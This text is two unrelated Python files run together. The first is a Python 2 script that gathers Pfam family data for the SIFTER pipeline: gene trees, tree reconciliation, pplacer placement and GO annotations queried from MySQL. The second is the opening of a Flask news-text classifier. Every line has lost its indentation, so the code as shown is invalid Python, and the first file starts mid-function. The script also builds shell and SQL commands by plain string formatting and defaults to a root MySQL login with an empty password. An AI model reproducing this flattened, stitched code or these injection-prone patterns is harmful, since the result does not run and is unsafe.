else:
tax_id=0
sp=''
return (tax_id,sp)
def find_best_taxid(my_id,db):
my_id=int(my_id)
mynode=orig_sp_tree_0.search_nodes(name='%d'%my_id)
if mynode:
des=list(set([int(w.name) for w in mynode[0].iter_descendants()]) & set(all_species_txids))
if des:
return des[0],find_tax_name(des[0],db)
else:
for node in mynode[0].iter_ancestors():
if node.name=="NoName":
continue
des=list(set([int(w.name) for w in node.iter_descendants()]) & set(all_species_txids))
if des:
return des[0],find_tax_name(des[0],db)
return -my_id,''
#reconcile the tree
def reconcile_tree(gene_tree_file,reconciled_file,rec_tag,pfam_id,db):
if (os.path.isfile(rec_tag+'ids.pickle')) and (pplacer_flag==1):
id_information = pickle.load(open(rec_tag+'ids.pickle', 'rb'))
existing_genes=id_information['existing_genes']
Sequnces=[]
p_ids=[]
new_genes=set([w['id'] for w in pplacer_queries[pfam_id]])
if not (new_genes-set(existing_genes)):
print "All %s Genes for family %s have already been placed in the reconciled tree."%(len(new_genes),pfam_id)
print "Skip Reconciliation for %s"%pfam_id
return
txid_file=rec_tag+'txid.xml'
if not(os.path.isfile(rec_tag+'ids.pickle')) or not(os.path.isfile(reconciled_file+'.gz')) or (pplacer_flag==1):
print "Running Reconciliation for: %s"%pfam_id
rand_id=random.randint(1000000,9999999)
subprocess.check_call("gunzip -c %s/%s.nw.gz > %s.%d"%(tree_folder,pfam_id,gene_tree_file,rand_id),shell=True)
tree = ete2.PhyloTree('%s.%d'%(gene_tree_file,rand_id), format=0)
tree.resolve_polytomy()
tree.write(format=0, outfile=txid_file+'.tmp.nw')
if os.path.exists('%s.%d'%(gene_tree_file,rand_id)):
subprocess.check_call("rm %s.%d"%(gene_tree_file,rand_id),shell=True)
Phylo.convert(txid_file+'.tmp.nw', 'newick', txid_file+'.tmp.xml', 'phyloxml')
treexml = PhyloXMLIO.read(open(txid_file+'.tmp.xml','r'))
tree = treexml[0]
treexml.attributes.pop('schemaLocation', None) # not supported by Forester
tree.rooted = True
my_ids=set([])
my_query_by_taxid={}
for leaf in tree.clade.find_clades(terminal=True):
up_name = leaf.name.split('/')[0]
tax_id,tax_name=find_tax_id_unip(up_name,db)
if tax_id not in all_species_txids:
if tax_id in merged_taxid.keys():
tax_id=merged_taxid[tax_id]
tax_name=find_tax_name(tax_id,db)
if tax_id in best_taxid_map.keys():
tax_id=best_taxid_map[tax_id]
tax_name=find_tax_name(tax_id,db)
else:
tax_id0=tax_id
tax_id,tax_name=find_best_taxid(tax_id,db)
if tax_id>0:
best_taxid_map[tax_id0]=tax_id
if tax_id<0:
if (-tax_id) in merged_taxid.keys():
tax_id=merged_taxid[-tax_id]
tax_name=find_tax_name(tax_id,db)
if tax_id in my_query_by_taxid:
my_query_by_taxid[tax_id].append(up_name)
else:
my_query_by_taxid[tax_id]=[up_name]
my_ids.add(tax_id)
my_tax_id = PhyloXML.Id(tax_id, provider='ncbi_taxonomy')
taxon=PhyloXML.Taxonomy(id=my_tax_id)
taxon.scientific_name = tax_name
leaf._set_taxonomy(taxon)
PhyloXMLIO.write(treexml, open(txid_file,'w'))
os.system('rm '+txid_file+'.tmp.nw')
os.system('rm '+txid_file+'.tmp.xml')
print "Taxid file done for: %s"%pfam_id
existing_ids=list(set(my_ids)&set(all_species_txids))
existing_genes=[g for txid in my_query_by_taxid.keys() for g in my_query_by_taxid[txid] if txid in existing_ids]
pickle.dump({'pfam_id':pfam_id,'existing_ids':existing_ids,'existing_genes':existing_genes}, open(rec_tag+'ids.pickle', 'wb'))
print "Pickle file done for: %s"%pfam_id
if os.path.exists(reconciled_file):
os.system('rm '+reconciled_file)
os.system("java -Xmx4g -cp %s/forester_1038.jar org.forester.application.gsdi -g %s %s/ncbi_2_fixed.xml %s"%(lib_path, txid_file, species_tree_data_path, reconciled_file))
if os.path.exists(reconciled_file):
if os.path.exists(reconciled_file+'.gz'):
subprocess.check_call("rm %s.gz"%(reconciled_file),shell=True)
subprocess.check_call("gzip %s"%(reconciled_file),shell=True)
os.system('rm '+rec_tag+'reconciled_species_tree_used.xml')
os.system('rm '+rec_tag+'reconciled_gsdi_log.txt')
os.system('rm '+txid_file)
print "Reconciliation file done for: %s"%pfam_id
def update_hmmer_alignment(sequences, orig_alignment, hmm,tmpf):
#tmpf = tempfile.NamedTemporaryFile(delete=False,
# suffix='.sto')
tmpf_o=open(tmpf,'w')
SeqIO.write(sequences, tmpf_o, "fasta")
tmpf_o.close()
pfam_hmm_align = PfamHMMERAlign()
# Make call and do initial parsing of results into format for ProteinInformation retrievers.
pfam_hmm_align.setup_caller(executable_locations = {
'hmmpress': path_to_hmmpress,
'hmmalign': path_to_hmmalign
},
params={
'hmm_file': hmm,
'orig_alignment': orig_alignment,
'query_sequences_fasta_file': tmpf
})
pfam_hmm_align.call()
pfam_hmm_align.parse_results()
return pfam_hmm_align.parsed_results
def pplacer_call(pplacer_package, aln_file, jplace_output_file):
pplacer = PplacerWrapper()
# Make call and do initial parsing of results into format for ProteinInformation retrievers.
pplacer.setup_caller(executable_locations = {
'pplacer': path_to_pplacer
},
params={
'package_location': pplacer_package,
'orig_alignment': aln_file,
'jplace_output_file': jplace_output_file
})
pplacer.call()
pplacer.parse_results()
return pplacer.parsed_results
def guppy_tree(jplace_file, tree_output_file):
guppy = GuppyWrapper()
guppy.setup_caller(executable_locations = {
'guppy': path_to_guppy
},
params={
'jplace_file': jplace_file,
'tree_output_file': tree_output_file
})
guppy.call()
guppy.parse_results()
return guppy.parsed_results
def hmm_build(hmmbuild_executable_loc,
sequence_file,
output_file):
'''
Calls hmmbuild
'''
cmd = hmmbuild_executable_loc \
+ " " + output_file \
+ " " + sequence_file
raw_data = subprocess.check_call(cmd, shell=True)
def taxit_create(taxit_executable_loc,
aln_fasta,
hmm_file,
tree_file,
tree_stats,
pfam_acc,
output_location,
aln_stockholm):
'''
Calls taxit
'''
#taxit create --clobber --aln-fasta ./PF14424.dedup.fasta --profile ./PF14424.wholefam.hmm --tree-file ./PF14424.dedup.nh --locus PF14424 --package-name PF14424.pplacer
cmd = taxit_executable_loc \
+ " create --clobber" \
+ " --aln-fasta " + aln_fasta \
+ " --profile " + hmm_file \
+ " --tree-file " + tree_file \
+ " --tree-stats " + tree_stats \
+ " --locus " + pfam_acc \
+ " --package-name " + output_location
raw_data = subprocess.check_call(cmd, shell=True)
input_handle = open(aln_fasta, "rU")
output_handle = open(aln_stockholm, "w")
alignments = AlignIO.parse(input_handle, "fasta")
AlignIO.write(alignments, output_handle, "stockholm")
output_handle.close()
input_handle.close()
def add_pplaced(pfam_id):
if pfam_id in pplacer_queries.keys():
print "Running PPlacer for: %s"%pfam_id
pplace_log=pplacer_folder+'/%s_pplace_log.txt'%pfam_id
Already_placed=[]
if os.path.exists(pplace_log):
with open(pplace_log, "r") as myfile:
for line in myfile:
line=line.strip()
if not line:
continue
line=line.split('\t')
if not len(line)==2:
continue
Already_placed.extend(line[1].split(','))
Sequnces=[]
p_ids=[]
for new_gene in pplacer_queries[pfam_id]:
p_id = new_gene['pplacer_id']
if p_id in Already_placed:
continue
p_ids.append(p_id)
p_seq = gene_seq[new_gene['id']][(new_gene['seq_start']-1):new_gene['seq_end']]
Sequnces.append(SeqRecord(p_seq, id=p_id))
if not p_ids:
print "All %s domains for family %s have already been pplaced."%(len(Already_placed),pfam_id)
return
rand_id_1=random.randint(1000000,9999999)
rand_id_2=random.randint(1000000,9999999)
rand_id_3=random.randint(1000000,9999999)
subprocess.check_call("gunzip -c %s/%s.log.gz > %s/%s.log.%d"%(tree_folder,pfam_id,tree_folder,pfam_id,rand_id_1),shell=True)
subprocess.check_call("gunzip -c %s/%s.nw.gz > %s/%s.nw.%d"%(tree_folder,pfam_id,tree_folder,pfam_id,rand_id_2),shell=True)
subprocess.check_call("gunzip -c %s/%s.fasta.gz > %s/%s.fasta.%d"%(alignment_folder,pfam_id,alignment_folder,pfam_id,rand_id_3),shell=True)
AlignIO.convert("%s/%s.fasta.%d"%(alignment_folder,pfam_id,rand_id_3),"fasta","%s/%s.sth.%d"%(alignment_folder,pfam_id,rand_id_3),"stockholm")
hmm_build(hmmbuild_executable_loc=path_to_hmmbuild,
sequence_file='%s/%s.sth.%d'%(alignment_folder,pfam_id,rand_id_3),
output_file='%s/%s.hmm'%(pplacer_folder,pfam_id))
taxit_create(taxit_executable_loc=path_to_taxit,
aln_fasta='%s/%s.fasta.%d'%(alignment_folder,pfam_id,rand_id_3),
hmm_file='%s/%s.hmm'%(pplacer_folder,pfam_id),
tree_file='%s/%s.nw.%d'%(tree_folder,pfam_id,rand_id_2),
tree_stats='%s/%s.log.%d'%(tree_folder,pfam_id,rand_id_1),
pfam_acc=pfam_id,
output_location='%s/%s_pplacer'%(pplacer_folder,pfam_id),
aln_stockholm='%s/%s_pplacer/%s.sto.%d'%(pplacer_folder,pfam_id,pfam_id,rand_id_3),
)
if os.path.exists("%s/%s.log.%d"%(tree_folder,pfam_id,rand_id_1)):
subprocess.check_call("rm %s/%s.log.%d"%(tree_folder,pfam_id,rand_id_1),shell=True)
if os.path.exists("%s/%s.nw.%d"%(tree_folder,pfam_id,rand_id_2)):
subprocess.check_call("rm %s/%s.nw.%d"%(tree_folder,pfam_id,rand_id_2),shell=True)
if os.path.exists("%s/%s.fasta.%d"%(alignment_folder,pfam_id,rand_id_3)):
subprocess.check_call("rm %s/%s.fasta.%d"%(alignment_folder,pfam_id,rand_id_3),shell=True)
if os.path.exists("%s/%s.sth.%d"%(alignment_folder,pfam_id,rand_id_3)):
subprocess.check_call("rm %s/%s.sth.%d"%(alignment_folder,pfam_id,rand_id_3),shell=True)
output_prefix = '%s/%s_pplaced'%(pplacer_folder,pfam_id)
updated_aln = output_prefix + '.sto'
jplace_output_file = output_prefix + '.jplace'
tree_output_file = output_prefix + '.tre'
sequence_file='%s/%s.sth'%(alignment_folder,pfam_id)
aln_fasta='%s/%s.fasta'%(alignment_folder,pfam_id)
tree_file='%s/%s.nw'%(tree_folder,pfam_id)
pplacer_pkg_dir ='%s/%s_pplacer'%(pplacer_folder,pfam_id)
pplacer_pkg_hmm = '%s/%s.hmm'%(pplacer_pkg_dir,pfam_id)
pplacer_pkg_aln = '%s/%s.sto.%d'%(pplacer_pkg_dir,pfam_id,rand_id_3)
tmpf='%s/%s.tmpf'%(pplacer_pkg_dir,pfam_id)
# Update alignment to include the query sequence for the hypothetical domain.
aln_res = update_hmmer_alignment(Sequnces,
orig_alignment=pplacer_pkg_aln,
hmm=pplacer_pkg_hmm,tmpf=tmpf)
aln_out = open(updated_aln,'w')
AlignIO.write(aln_res[0], aln_out, 'stockholm')
aln_out.close()
# Call pplacer to generate placements onto the tree.
pplaced = pplacer_call(pplacer_package=pplacer_pkg_dir,
aln_file=updated_aln,
jplace_output_file=jplace_output_file)
# Use the "guppy" tool to generate the best-placement tree with query as a leaf.
gt = guppy_tree(jplace_file=jplace_output_file,
tree_output_file=tree_output_file)
#Phylo.convert(tree_output_file, 'newick', tree_output_file_xml, 'phyloxml')
os.system('rm -rf %s'%(pplacer_pkg_dir))
os.system('rm %s/%s.hmm'%(pplacer_folder,pfam_id))
os.system('rm %s/%s_pplaced.jplace'%(pplacer_folder,pfam_id))
os.system('mv %s %s'%(updated_aln,sequence_file))
AlignIO.convert(sequence_file,"stockholm",aln_fasta,"fasta")
if os.path.exists(aln_fasta+'.gz'):
subprocess.check_call("rm %s.gz"%(aln_fasta),shell=True)
subprocess.check_call("gzip %s"%(aln_fasta),shell=True)
cmd='mv %s %s'%(tree_output_file,tree_file)
os.system(cmd)
if os.path.exists(tree_file+'.gz'):
subprocess.check_call("rm %s.gz"%(tree_file),shell=True)
subprocess.check_call("gzip %s"%(tree_file),shell=True)
with open(pplace_log, "a") as myfile:
myfile.write("%s\t%s\n"%(my_sequence_file,','.join(p_ids)))
def process_tree(pfam_id,db):
align_file = alignment_folder+'/%s'%pfam_id
reconciled_fname = reconciled_folder+'/%s'%pfam_id
if (os.path.isfile(align_file+".fasta.gz")): #if you have an alignment file...
if not(os.path.isfile(reconciled_fname+"_reconciled.xml.gz")) or (pplacer_flag==1):
print "Process Tree for", pfam_id, "with", tree_sizes[pfam_id],"leaves"
# make a gene tree
if not(os.path.isfile("%s/%s.nw.gz"%(tree_folder,pfam_id))): #make a tree based on the alignment
print "Running FastTree for: %s"%pfam_id
rand_id_1=random.randint(1000000,9999999)
subprocess.check_call("gunzip -c %s.fasta.gz > %s.fasta.%d"%(align_file,align_file,rand_id_1),shell=True)
subprocess.check_call(lib_path + "/FastTree -log %s/%s.log %s/%s.fasta.%d > %s/%s.nw"%(tree_folder,pfam_id,alignment_folder,pfam_id,rand_id_1,tree_folder,pfam_id),shell=True);
if os.path.exists("%s.fasta.%d"%(align_file,rand_id_1)):
subprocess.check_call("rm %s.fasta.%d"%(align_file,rand_id_1),shell=True)
if os.path.exists('%s/%s.log.gz'%(tree_folder,pfam_id)):
subprocess.check_call("rm %s/%s.log.gz"%(tree_folder,pfam_id),shell=True)
if os.path.exists('%s/%s.nw.gz'%(tree_folder,pfam_id)):
subprocess.check_call("rm %s/%s.nw.gz"%(tree_folder,pfam_id),shell=True)
subprocess.check_call("gzip %s/%s.log"%(tree_folder,pfam_id),shell=True)
subprocess.check_call("gzip %s/%s.nw"%(tree_folder,pfam_id),shell=True)
if pplacer_flag:
pplaced_file = add_pplaced(pfam_id)
gene_tree_file = tree_folder+ '/%s.nw'%(pfam_id)
reconciled_file='%s/%s_reconciled.xml'%(reconciled_folder,pfam_id)
rec_tag='%s/%s_'%(reconciled_folder,pfam_id)
if not(os.path.isfile(reconciled_file+'.gz')) or (pplacer_flag==1):
reconcile_tree(gene_tree_file, reconciled_file, rec_tag, pfam_id,db)
return pfam_id
def get_goa_annotations_for_pfam_acc_new(domain_acc, evidence_constraints_all,db):
sql="""SELECT
goa_db.term_id as acc,
goa_db.evidence_code as code,
pfamseq.pfamseq_acc,
pfamseq.pfamseq_id
FROM goa_db
INNER JOIN pfamseq on (goa_db.uniprot_id=pfamseq.pfamseq_acc)
INNER JOIN pfamA_reg_full_significant on (pfamA_reg_full_significant.auto_pfamseq=pfamseq.auto_pfamseq)
INNER JOIN pfamA on (pfamA.auto_pfamA=pfamA_reg_full_significant.auto_pfamA)
WHERE
pfamA.pfamA_acc='%s'
AND goa_db.term_type = 'F'
AND goa_db.evidence_code in ('%s')
"""%(domain_acc, "','".join(evidence_constraints_all))
seq_anns = msql(sql, db)
return seq_anns
def parse_goa_pfam_annots(seq_anns):
anns = {}
seq_lookup = {}
for a in seq_anns:
pid = a['pfamseq_acc']
seq_lookup[a['pfamseq_acc']] = a['pfamseq_id']
if pid not in anns:
anns[pid] = []
anns[pid].append(a)
return anns, seq_lookup
def write_goa_anns_to_pli(evidence_file,goa_anns, fam_id, seq_lookup):
'''
    This converts the database rows to B. Engelhardt's arbitrary evidence XML format.
Input looks like:
{'A2VE79': [{'acc': 'GO:0000287',
'code': 'ISS',
'full_name': 'Diphosphoinositol polyphosphate phosphohydrolase 1',
'genus': 'Bos',
'is_not': 0L,
'name': 'magnesium ion binding',
'species': 'taurus',
'symbol': 'NUDT3',
'xref_dbname': 'UniProtKB',
'xref_key': 'A2VE79'},
{'acc': 'GO:0008486',
'code': 'ISS',
'full_name': 'Diphosphoinositol polyphosphate phosphohydrolase 1',
'genus': 'Bos',
'is_not': 0L,
'name': 'diphosphoinositol-polyphosphate diphosphatase activity',
'species': 'taurus',
'symbol': 'NUDT3',
'xref_dbname': 'UniProtKB',
'xref_key': 'A2VE79'},
...
'''
f = open(evidence_file, 'w')
f.write("<?xml version=\"1.0\"?>\n<Family>\n")
f.write(" <FamilyID>%s</FamilyID>\n"%fam_id)
for p_id, anns in goa_anns.iteritems():
f.write(" <Protein>\n")
f.write(" <ProteinName>%s</ProteinName>\n"%seq_lookup[p_id])
f.write(" <ProteinNumber>%s</ProteinNumber>\n"%p_id)
go_str = ''
moc_str = ''
for i,a in enumerate(anns):
go_str += a['acc'][3:]
moc_str += a['code']
if i < len(anns)-1:
go_str += ', '
moc_str += ', '
f.write(" <GONumber>%s</GONumber>\n"%('['+go_str+']'))
f.write(" <MOC>%s</MOC>\n"%('['+moc_str+']'))
f.write(" </Protein>\n")
f.write("</Family>\n")
f.close()
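# For the docstring example above, the generated .pli file looks roughly like this
# (FamilyID and ProteinName are hypothetical here, since they come from the fam_id
# argument and the seq_lookup mapping respectively):
#
#   <?xml version="1.0"?>
#   <Family>
#     <FamilyID>PF00293</FamilyID>
#     <Protein>
#       <ProteinName>NUDT3_BOVIN</ProteinName>
#       <ProteinNumber>A2VE79</ProteinNumber>
#       <GONumber>[0000287, 0008486]</GONumber>
#       <MOC>[ISS, ISS]</MOC>
#     </Protein>
#   </Family>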
# Get all evidence and then write each to file.
def get_evidence(p,my_db):
evidence_file = evidence_folder+'/%s.pli'%p
if not(os.path.isfile(evidence_file+'.gz')):
evidence_pickle_file = evidence_folder+'/%s.pickle'%p
print "Retrieving goa annotations for %s..."%p
seq_anns = get_goa_annotations_for_pfam_acc_new(domain_acc=p, evidence_constraints_all=evidence_constraints_all,db=my_db)
anns, seq_lookup = parse_goa_pfam_annots(seq_anns=seq_anns)
print "got %i results."%len(anns)
id_information = pickle.load(open(reconciled_folder+'/%s_ids.pickle'%p, 'rb'))
miss_flag=0
del_anns=[]
for gene,ev in anns.iteritems():
if ev[0]['pfamseq_id'] not in id_information['existing_genes']:
miss_flag=1
del_anns.append(gene)
continue
if miss_flag==1:
for gene in del_anns:
anns.pop(gene)
write_goa_anns_to_pli(evidence_file,anns, p, seq_lookup)
pickle.dump([evidence_file,anns, p, seq_lookup], open(evidence_pickle_file, 'wb'))
if os.path.exists(evidence_file):
if os.path.exists(evidence_file+'.gz'):
subprocess.check_call("rm %s.gz"%(evidence_file),shell=True)
subprocess.check_call("gzip %s"%(evidence_file),shell=True)
if os.path.exists(evidence_pickle_file):
if os.path.exists(evidence_pickle_file+'.gz'):
subprocess.check_call("rm %s.gz"%(evidence_pickle_file),shell=True)
subprocess.check_call("gzip %s"%(evidence_pickle_file),shell=True)
print "Wrote evidence to %s"%evidence_file
def gather_for_each_family(pfam_id,my_db):
align_file = alignment_folder+'/%s'%pfam_id
reconciled_fname = reconciled_folder+'/%s'%pfam_id
evidence_file = evidence_folder+'/%s.pli'%pfam_id
evidence_pickle_file = evidence_folder+'/%s.pickle'%pfam_id
queries_to_process=[]
if not(os.path.isfile(align_file+".fasta.gz")):
get_alignment(pfam_id,my_db)
if (os.path.isfile(align_file+".fasta.gz")): #if you have an alignment file...
if not(os.path.isfile(reconciled_fname+"_reconciled.xml.gz")) or (pplacer_flag==1):
process_tree(pfam_id,my_db)
if not(os.path.isfile(evidence_pickle_file+'.gz')):
get_evidence(pfam_id,my_db)
class ProcessingThread_gather(threading.Thread):
"""Thread for running sequence alignments on a given input homolog cluster."""
def __init__(self, thread_queue,db):
threading.Thread.__init__(self)
self.thread_queue = thread_queue
self.db=db
def thread_operation(self, thread_data):
pfam_id = thread_data
my_db=self.db
try:
print "--------------------------------------------------"
print "Gathering family data for %s"%pfam_id
# Input evidence
gather_for_each_family(pfam_id,my_db)
print "Family data files gathered for %s"%pfam_id
print "---------------"
except Exception as e:
print >> sys.stderr, "Error gathering family data for %s"%pfam_id
print >> sys.stderr, "Error: ", e
exit(1)
def run(self):
while True:
# Spawn a thread with data from the queue
thread_data = self.thread_queue.get()
# Run thread's function on the data
try:
self.thread_operation(thread_data)
except:
print "Unexpected thread error:", sys.exc_info()[0]
print "Thread data:", thread_data
# Send signal that this task finished
self.thread_queue.task_done()
if __name__=="__main__":
# Initialization
params_mysql = {\
'db_address': 'localhost',
'db_username': 'root',
'db_password': '',
'db_name': 'sifter_db'
}
evidence_constraints_all = [
# Experimental
'EXP', # Experiment
'IDA', # Direct Assay
'IPI', # Physical Interaction
'IMP', # Mutant Phenotype
'IGI', # Genetic Interaction
'IEP', # Expression Pattern
# Author Statements
'TAS', # Traceable Author Statement
'NAS', # Non-traceable Author Statement
# Computational Analysis Evidence Codes
'ISS', # Sequence/Structural Similarity
'ISO', # Sequence Orthology
'ISA', # Sequence Alignment
'ISM', # Sequence Model
'IGC', # Genomic Context
'IBA', # Biological aspect of ancestor
'IBD', # Biological aspect of descendant
'IKR', # Key Residues
'IRD', # Rapid Divergence
'RCA', # Reviews Computational Analysis
# Curator Statement
'IC', # Curator
'ND', # No biological data available
# Automatically assigned
'IEA', # Electronic Annotation
# Obsolete
'NR' # Not recorded
]
main_dir=os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
species_tree_data_path = main_dir+'/data/species_tree_data'
lib_path=main_dir+'/lib'
path_to_hmmbuild='hmmbuild'
path_to_hmmpress='hmmpress'
path_to_hmmalign='hmmalign'
path_to_taxit='taxit'
path_to_pplacer=lib_path+'/pplacer-v1.1/pplacer'
path_to_guppy=lib_path+'/pplacer-v1.1/guppy'
#???
best_taxid_map_file=species_tree_data_path+'/best_taxid_map.pickle'
#???
merged_taxid_file = species_tree_data_path+'/merged.dmp'
num_threads=4
pplacer_flag = 0
my_sequence_file=''
hit_file=''
my_taxid=''
all_fams=0
pfams=[]
input_file=''
# Check for options
opts, args = getopt.getopt(sys.argv[1:], "hi:f:n:A",['dbname=','dbpass=','dbuser=','dbaddr=','seq_file=','hit_file=','taxid='])
if len(args) != 1:
usage()
sys.exit()
choices=[]
new_genome_choices=[]
if len(opts)>0:
for o, a in opts:
if o == "-f":
splited =a.strip().split(',')
pfams=list(set([w for w in splited if w]))
choices.append('f')
elif o == "-i":
input_file = a
choices.append('i')
elif o == "-A":
all_fams = 1
choices.append('A')
elif o == "--seq_file":
my_sequence_file = a
new_genome_choices.append('seq_file')
elif o == "--hit_file":
hit_file = a
new_genome_choices.append('hit_file')
elif o == "--taxid":
my_taxid = a
new_genome_choices.append('taxid')
elif o == "-n":
num_threads=int(a)
elif o == "--dbname":
params_mysql['db_name']= a
elif o == "--dbaddr":
params_mysql['db_address']= a
elif o == "--dbpass":
params_mysql['db_password']= a
elif o == "--dbuser":
params_mysql['db_username']= a
else:
usage()
sys.exit()
if len(new_genome_choices)>0 and len(new_genome_choices)<3:
print "\nERROR: To gather data for a new genome, please enter information for all '--seq_file', '--hit_file', and '--taxid' options.\n"
sys.exit()
if my_sequence_file:
if not os.path.exists(my_sequence_file):
print "\nERROR: No sequence file at %s.\n"%my_sequence_file
sys.exit()
if hit_file:
if not os.path.exists(hit_file):
print "\nERROR: No Pfam hit file at %s.\n"%hit_file
sys.exit()
if len(choices)==0:
print "\nERROR: No pfam families are entered."
print "Please use one of the -f or -i or -A options to enter your query.\n"
sys.exit()
elif len(choices)>1:
print "\nERROR: Please use ONLY one of the -f or -i or -A options to enter your query.\n"
sys.exit()
if (len(new_genome_choices)==0) and ('A' in choices):
print "\nERROR: Option -A can only be used when gather data for a novel species.\n"
sys.exit()
output_families_data_path=args[0]
if not os.path.exists(output_families_data_path):
os.mkdir(output_families_data_path)
evidence_folder=output_families_data_path+'/annotations'
if not os.path.exists(evidence_folder):
os.mkdir(evidence_folder)
alignment_folder=output_families_data_path+'/alignments'
if not os.path.exists(alignment_folder):
os.mkdir(alignment_folder)
reconciled_folder=output_families_data_path+'/reconciled_trees'
if not os.path.exists(reconciled_folder):
os.mkdir(reconciled_folder)
tree_folder=reconciled_folder+'/trees'
if not os.path.exists(tree_folder):
os.mkdir(tree_folder)
db_mysql = MySQLdb.connect(host=params_mysql['db_address'],
user=params_mysql['db_username'],
passwd=params_mysql['db_password'],
db=params_mysql['db_name'],
cursorclass=MySQLdb.cursors.DictCursor)
print "\n\n--------------Reading the input famiy information------------"
if pfams:
print "Run SIFTER for %s Pfam Families"%len(pfams)
elif input_file:
if not os.path.exists(input_file):
print "\nERROR: No file exists at %s\n"%input_file
sys.exit()
f = open(input_file, 'r')
a=f.read()
splited =re.split(' |,|;|\n',a.strip())
pfams=list(set([w for w in splited if w]))
print "Run SIFTER for %s Pfam Families"%len(pfams)
if (not pfams) and (len(new_genome_choices)==0) :
print "\nERROR: No pfam families are entered.\n"
sys.exit()
if len(new_genome_choices)==3:
print "\n\n--------------Reading the Pfam hit file------------"
gene_seq,pplacer_queries=find_pfam_hits_from_file(hit_file,my_sequence_file)
if not pfams:
pfams=pplacer_queries.keys()
print "We will run on All %s Pfam Families of your novel species."%len(pfams)
pfds=get_pfds(pfams,db_mysql)
tree_sizes = {}
for p in pfds.keys():
tree_sizes[p] = pfds[p]['num_full']
sorted_fams = sorted(pfds.keys(), key=lambda k:pfds[k]['num_full'])
print "Number of families to process:" ,len(sorted_fams)
print "\n\n--------------Reading the species tree data------------"
# ##3-Extract tree information for each Pfam family
all_species_txids_pickled=species_tree_data_path + '/all_species_txids.pickle'
all_species_txids=pickle.load(open(all_species_txids_pickled))
orig_sp_tree_0 = ete2.PhyloTree(species_tree_data_path + '/ncbi.nw', format=0)
zero_taxids={'HUMAN':9606, '9CAUD':70702, 'BABHY':37552, 'ARATH':3702, '9STAP':1077965, 'SALTM':99287, '9MYCO':512402, '9RETR':31697,
'BEABA':176275, '9EURO':1194637, '9BACE':871324, '9CAEN':1181719 }
best_taxid_map=pickle.load(open(best_taxid_map_file,'r'))
#???
merged_f=open(merged_taxid_file,'r')
merged_taxid={}
for line in merged_f.readlines():
my_line=line.split('\t')
merged_taxid[int(my_line[0])]=int(my_line[2])
merged_f.close()
print "\n------------Gather the necessary data for families-------------"
my_taxid0=my_taxid
if my_taxid0:
success=1
if my_taxid0 not in all_species_txids:
success=0
if my_taxid0 in merged_taxid.keys():
my_taxid0=merged_taxid[my_taxid0]
tax_name=find_tax_name(my_taxid0,db_mysql)
if my_taxid0 in best_taxid_map.keys():
my_taxid0=best_taxid_map[my_taxid0]
tax_name=find_tax_name(my_taxid0,db_mysql)
success=1
else:
tax_id0=my_taxid0
my_taxid0,tax_name=find_best_taxid(my_taxid0,db_mysql)
if my_taxid0>0:
best_taxid_map[tax_id0]=my_taxid0
success=1
if success==0:
print "\nThe taxonomy ID you entered does not exist in our database, please enter the correct NCBI taxonomy ID for your species. You may also enter the NCBI taxonomy ID for a close species to your query that exist in our dataset.%s\n"
sys.exit()
else:
pplacer_flag=1
pplacer_folder=reconciled_folder+'/pplaced'
if not os.path.exists(pplacer_folder):
os.mkdir(pplacer_folder)
pfams_to_process = []
for i,pfam_id in enumerate(sorted_fams):
if pplacer_flag==1:
if pfam_id not in pplacer_queries:
print "Your queried species does not have a gene in family %s)"%(pfam_id)
print "We will Skip this family"
print "---------------"
continue
pfams_to_process.append(pfam_id)
thread_queue = Queue.Queue()
for i in range(num_threads):
my_db=MySQLdb.connect(host=params_mysql['db_address'],
user=params_mysql['db_username'],
passwd=params_mysql['db_password'],
db=params_mysql['db_name'],
cursorclass=MySQLdb.cursors.DictCursor)
t = ProcessingThread_gather(thread_queue,my_db)
t.setDaemon(True)
t.start()
for pfam_id in pfams_to_process:
thread_queue.put(item=pfam_id, block=False)
# Wait on the queue until everything has been processed
thread_queue.join()
errors=0
for pfam_id in pfams_to_process:
evidence_pickle_file = output_families_data_path+'/annotations/%s.pickle'%pfam_id
if not (os.path.isfile(evidence_pickle_file+'.gz')):
errors+=1
if errors==0:
print "-------------------Data gadering is Done----------------------"
print "\nNext step is to run 'sifter_prepare.py' to prepares necessary files for your query to run SIFTER on."
else:
print "\nData files are gatherd for %d out of %d families. (%s missed due to errors)"%(len(pfams_to_process)-errors,len(pfams_to_process),errors)
|
########
# _________________
# | |
# | Package Upload |
# |_________________|
#
########
# System packages
import json
import os
import time
import sys
from os import listdir
from os.path import isfile, join
# scientific computing and ML packages
import torch
import numpy as np
import pandas as pd
import tensorflow as tf
import networkx as nx
import math, scipy, copy, re
from bs4 import BeautifulSoup
import cgi
# used in the count of words
import string
# NLTK toolkit
import nltk
import nltk.data # natural language tool kit
# for tokenizing sentences according by the words
from nltk.tokenize import WhitespaceTokenizer
from nltk.tokenize import sent_tokenize, word_tokenize # $ pip install nltk
from nltk.corpus import stopwords
nltk.download('punkt')
nltk.download('stopwords')
from nltk.cluster.util import cosine_distance
# Machine Learning Packages
import joblib
from sklearn import model_selection, preprocessing, metrics
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.model_selection import train_test_split
# additional python files
import model
import sample
import encoder
#import forms
#from forms import ContactForm
from flask import render_template, jsonify, request, flash
from writrly import application
#from flask_mail import Message, Mail
###############################
# ___________________________________
# | |
# | Checks whether GPU is available |
# |___________________________________|
#
################################
def GPU_avail():
# Checking if GPU is available
work_with_gpu = torch.cuda.is_available()
if(work_with_gpu):
return (" Program is using the GPU!")
else:
return ('No GPU available. Using CPU.')
################################
# _______________________
# | |
# | Code for Classifier |
# |_______________________|
#
################################
## cleaning text
REPLACE_BY_SPACE_RE = re.compile('[/(){}\[\]\|@,;]')
BAD_SYMBOLS_RE = re.compile('[^0-9a-z #+_]')
STOPWORDS = set(stopwords.words('english'))
def clean_text(text):
"""
text: a string
return: modified initial string
"""
text = BeautifulSoup(text, "lxml").text # HTML decoding
text = text.lower() # lowercase text
text = REPLACE_BY_SPACE_RE.sub(' ', text) # replace REPLACE_BY_SPACE_RE symbols by space in text
text = BAD_SYMBOLS_RE.sub('', text) # delete symbols which are in BAD_SYMBOLS_RE from text
    text = ' '.join(word for word in text.split() if word not in STOPWORDS) # delete stopwords from text
return text
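# Illustrative example (not from the original code): the cleaning pipeline
# strips HTML, lowercases, replaces/removes punctuation, and drops stopwords,
# e.g. clean_text('<p>Hello, World!</p>') returns 'hello world'.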
## key for classifier
class_key = ['Business',
'Education',
'Entertainment',
'Health',
'Ideas',
'International',
'Politics',
'Science',
'Short Story',
'Technology']
# load in csv file
masterDF = pd.read_csv('./writrly/static/data/master_df.csv')
#load model from file
